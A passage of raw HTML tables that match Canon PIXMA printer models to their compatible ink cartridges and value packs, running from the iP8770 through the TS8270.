(Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"12\" align=\"center\">PIXMA iP8770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6870</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2570S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2577S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\"><tbody><tr align=\"center\"><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MG3570</td><td>CL-741 (Colour)</td></tr><tr><td>CL-741XL (Colour)</td></tr><tr><td>PG-740 (Pigment Black)</td></tr><tr><td>PG-740/CL-741 Value Pack</td></tr><tr><td>PG-740XL (Pigment Black)</td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MG3670</td><td>CL-741 (Colour)</td></tr><tr><td>CL-741XL (Colour)</td></tr><tr><td>PG-740 (Pigment Black)</td></tr><tr><td>PG-740/CL-741 Value Pack</td></tr><tr><td>PG-740XL (Pigment Black)</td></tr><tr><td rowspan=\"10\" align=\"center\">PIXMA MG7570</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Gray)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Gray)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP160</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP170</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP180</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MP228</td><td>CL-41 (Colour)</td></tr><tr><td>CL-831 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td>PG-830 (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP237</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP245</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP258</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP276</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr></tbody></table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"170\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP287</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA MP460</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP476</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>CL-831 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td>PG-830 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP486</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP496</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP497</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP500</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA MP520</td>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP530</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP568</td>\n<td>CLI-821 (Black)</td>\n</tr>\n<tr>\n<td>CLI-821 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-821 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-821 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-820 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP600</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL 